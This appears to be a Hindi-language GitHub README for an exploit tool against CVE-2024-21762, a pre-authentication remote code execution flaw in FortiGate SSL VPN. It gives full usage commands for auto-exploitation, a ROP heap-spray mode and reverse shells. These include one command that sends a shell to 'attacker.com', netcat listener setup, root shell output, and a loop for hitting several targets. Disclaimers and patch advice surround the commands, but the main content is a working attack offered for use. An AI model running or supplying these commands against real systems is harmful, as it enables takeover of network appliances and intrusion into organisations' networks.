
CVE-2024-21762 का पता लगाता है और FortiGate SSL VPN में प्री-ऑथेंटिकेशन RCE का शोषण करता है, जिसमें बेसलाइन सत्यापन, स्वचालित शोषण, ROP हीप-स्प्रे मोड और रिवर्स शेल शामिल हैं।
CVE-2024-21762 के लिए पहचान और शोषण उपकरण - FortiGate SSL VPN में गंभीर भेद्यता
⚠️ कानूनी चेतावनी: यह उपकरण केवल अधिकृत परीक्षण वातावरण के लिए है। अनधिकृत उपयोग अवैध है और गंभीर कानूनी परिणामों का कारण बन सकता है।
CVE-2024-21762 FortiGate SSL VPN घटकों में एक गंभीर भेद्यता है जो प्रमाणीकरण-पूर्व दूरस्थ कोड निष्पादन (RCE) की अनुमति देती है। यह दोष Transfer-Encoding chunked के साथ HTTP अनुरोधों के संवेदनशील पार्सिंग में मौजूद है, जिसके परिणामस्वरूप sslvpnd घटक में out-of-bounds write होता है।
| गुण | जानकारी |
|---|---|
| CVE ID | CVE-2024-21762 |
| भेद्यता | sslvpnd में out-of-bounds write |
| प्रकार | प्रमाणीकरण-पूर्व दूरस्थ कोड निष्पादन (RCE) |
| CVSS स्कोर | 9.8 (गंभीर) |
| प्रभावित घटक | FortiOS SSL VPN |
| संवेदनशील संस्करण | 7.0.0-7.0.13, 7.2.0-7.2.6, 7.4.0-7.4.2 |
✅ भेद्यता का पता लगाना - दोषपूर्ण अनुरोधों के माध्यम से संवेदनशील FortiGate की पहचान
✅ बेसलाइन परीक्षण - परीक्षणों से पहले सर्वर के सामान्य व्यवहार की जाँच
✅ स्वचालित मोड - स्वचालित रूप से भेद्यता का पता लगाएं और शोषण करें
✅ रिवर्स शेल - आईपी/पोर्ट कॉन्फ़िगरेशन के साथ bash रिवर्स शेल का समर्थन
✅ इनपुट सत्यापन - शोषण से पहले आईपी और पोर्ट को मान्य करें
✅ विस्तृत रिपोर्ट - सुधार अनुशंसाओं के साथ रिपोर्ट तैयार करें
✅ मजबूत त्रुटि प्रबंधन - कनेक्शन और अपवादों का सुरक्षित प्रबंधन
# रिपॉजिटरी क्लोन करें
git clone https://github.com/your-username/CVE-2024-21762.git
cd CVE-2024-21762
# सिंटैक्स जांचें
python -m py_compile EXPLOIT.py
# स्क्रिप्ट चलाएं
python EXPLOIT.py -h
# सरल पहचान परीक्षण
python EXPLOIT.py 192.168.1.100
# कस्टम पोर्ट के साथ
python EXPLOIT.py 192.168.1.100 -p 8443
# बढ़ी हुई टाइमआउट के साथ
python EXPLOIT.py 192.168.1.100 --timeout 20
# पूर्व-कॉन्फ़िगर्ड रिवर्स शेल के साथ स्वचालित मोड
python EXPLOIT.py 192.168.1.100 --auto -li 10.0.0.5 -lp 4444
# बिना क्रेडेंशियल के स्वचालित मोड (संवादात्मक रूप से पूछता है)
python EXPLOIT.py 192.168.1.100 --auto
ROP मोड विशिष्ट लक्ष्यों (FortiOS 7.4.2) के लिए हीप स्प्रे के साथ दो-चरणीय शोषण लागू करता है:
# Node.js रिवर्स शेल के साथ ROP शोषण
python EXPLOIT.py 192.168.1.100 --rop -li 10.0.0.5 -lp 4242
# कस्टम पोर्ट के साथ
python EXPLOIT.py 192.168.1.100 -p 8443 --rop -li attacker.com -lp 4242
# धीमे लक्ष्यों के लिए बढ़ी हुई टाइमआउट के साथ
python EXPLOIT.py 192.168.1.100 --rop -li 192.168.1.50 -lp 9999 --timeout 30
ROP शोषण प्रवाह:
अपने सुनने वाले सर्वर पर:
# Linux/Mac/Windows netcat के साथ
nc -lnvp 4242
# अपेक्षित आउटपुट:
# listening on [any] 4242 ...
# connect to [10.0.0.5] from (UNKNOWN) [192.168.1.100] 54321
# id
# uid=0(root) gid=0(root) groups=0(root)
⚠️ महत्वपूर्ण नोट: ROP मोड FortiOS 7.4.2.F-build2571 के लिए अनुकूलित है। ROP श्रृंखला के हार्डकोडेड ऑफ़सेट के कारण अन्य संस्करण काम नहीं कर सकते हैं।
# रिवर्स शेल पेलोड भेजें
python EXPLOIT.py 192.168.1.100 -li 192.168.1.50 -lp 9999
# एकाधिक विकल्पों का संयोजन
python EXPLOIT.py -t target.com -p 8443 --auto -li attacker.com -lp 5555 --timeout 15
positional arguments:
target परीक्षण किया जाने वाला लक्ष्य होस्टनाम या आईपी
optional arguments:
-h, --help यह सहायता संदेश दिखाएं
-t, --target HOSTNAME लक्ष्य होस्टनाम या आईपी (वैकल्पिक)
-p, --port PORT SSL VPN पोर्ट (डिफ़ॉल्ट: 443)
--timeout SECONDS टाइमआउट सेकंड में (डिफ़ॉल्ट: 10)
-li, --lhost IP रिवर्स शेल प्राप्त करने के लिए स्थानीय आईपी
-lp, --lport PORT रिवर्स शेल प्राप्त करने के लिए स्थानीय पोर्ट
--no-baseline बेसलाइन परीक्षण छोड़ें
--auto स्वचालित मोड: पता लगाएं और शोषण करें
--rop ROP मोड: हीप स्प्रे के साथ उन्नत शोषण (FortiOS 7.4.2)
-v, --version स्क्रिप्ट संस्करण दिखाएं
python EXPLOIT.py 192.168.1.100
भेद्यता के मामले में अपेक्षित परिणाम:
[+] भेद्यता परीक्षण शुरू हो रहा है...
[!] संवेदनशील पाया गया!
[!] सर्वर ने कनेक्शन अचानक समाप्त कर दिया
[!] स्थिति: संवेदनशील
python EXPLOIT.py 192.168.1.100 --auto -li 192.168.1.50 -lp 4444
अपने सर्वर पर:
# Linux/Mac
nc -lnvp 4444
# Windows
ncat -lnvp 4444
for target in 192.168.1.100 192.168.1.101 192.168.1.102; do
python EXPLOIT.py $target --timeout 15
done
उपकरण एक लक्ष्य को संवेदनशील मानता है जब निम्नलिखित व्यवहारों में से एक का पता चलता है:
| संस्करण | पहचान | ROP मोड | स्थिति |
|---|---|---|---|
| FortiOS 7.0.0 - 7.0.13 | ✅ हाँ | ❌ नहीं | ⚠️ संवेदनशील |
| FortiOS 7.2.0 - 7.2.6 | ✅ हाँ | ❌ नहीं | ⚠️ संवेदनशील |
| FortiOS 7.4.0 - 7.4.1 | ✅ हाँ | ❌ नहीं | ⚠️ संवेदनशील |
| FortiOS 7.4.2 (build≤2571) | ✅ हाँ | ✅ हाँ | ⚠️ संवेदनशील |
| FortiOS 7.4.3+ | ❌ नहीं | ❌ नहीं | ✅ सुधारित |
FortiOS को सुधारित संस्करण में अपडेट करें:
अस्थायी अलगाव
निगरानी
# FortiOS संस्करण जांचें
python EXPLOIT.py your-fortinet.com
यदि परिणाम "संवेदनशील नहीं" दिखाता है, तो पैच सफलतापूर्वक लागू हो गया है।
CVE-2024-21762/
├── EXPLOIT.py # मुख्य शोषण स्क्रिप्ट
├── README.md # यह फ़ाइल
├── LICENSE # MIT लाइसेंस
└── .gitignore # Git कॉन्फ़िगरेशन
| तरीका | विवरण |
|---|---|
test_vulnerability() | दोषपूर्ण अनुरोध भेजकर भेद्यता का परीक्षण करें |
exploit(lhost, lport) | रिवर्स शेल के साथ भेद्यता का शोषण करें |
test_baseline() | सर्वर के सामान्य व्यवहार का परीक्षण करें |
generate_report() | स्थिति के साथ अंतिम रिपोर्ट तैयार करें |
_create_ssl_context() | पुन: प्रयोज्य SSL संदर्भ बनाएं |
_create_socket_connection() | सुरक्षित TLS कनेक्शन बनाएं |
_close_socket(sock) | सॉकेट को सुरक्षित रूप से बंद करें |
_is_valid_ip(ip_str) | आईपी प्रारूप मान्य करें |
उपकरण लागू करता है:
प्रश्न: क्या इसे Windows वातावरण में उपयोग किया जा सकता है?
उत्तर: हाँ, Python स्क्रिप्ट Windows पर काम करती है, लेकिन डिफ़ॉल्ट bash रिवर्स शेल काम नहीं करेगा। आपको कस्टम पेलोड की आवश्यकता होगी।
प्रश्न: मुझे कैसे पता चलेगा कि शोषण सफल रहा?
उत्तर: रिवर्स शेल के लिए सुनने वाली मशीन (nc/ncat) की जांच करें। स्क्रिप्ट प्रगति दर्शाने वाले संदेश दिखाएगी।
प्रश्न: क्या मैं इसे एकाधिक लक्ष्यों के खिलाफ उपयोग कर सकता हूं?
उत्तर: हाँ, आप आईपी सूची पर पुनरावृत्ति करने के लिए bash/PowerShell स्क्रिप्ट बना सकते हैं।
प्रश्न: सामान्य मोड और स्वचालित मोड में क्या अंतर है?
उत्तर: स्वचालित मोड यदि भेद्यता मिलती है तो स्वचालित रूप से शोषण करता है। सामान्य मोड केवल पता लगाता है।
कोई बग मिला या सुझाव हैं? एक issue खोलें या pull request करें!
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
यह सॉफ्टवेयर "जैसा है" अनुसंधान और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया जाता है। लेखक इसके लिए जिम्मेदार नहीं हैं:
जिम्मेदारी से उपयोग करें और केवल अधिकृत वातावरण में
साइबर सुरक्षा शिक्षा और अनुसंधान उद्देश्यों के लिए विकसित।
⚠️ याद रखें: इस उपकरण का उपयोग केवल उन प्रणालियों पर करें जिनके आप मालिक हैं या जिनके परीक्षण करने की स्पष्ट अनुमति है। अनधिकृत शोषण अपराध है।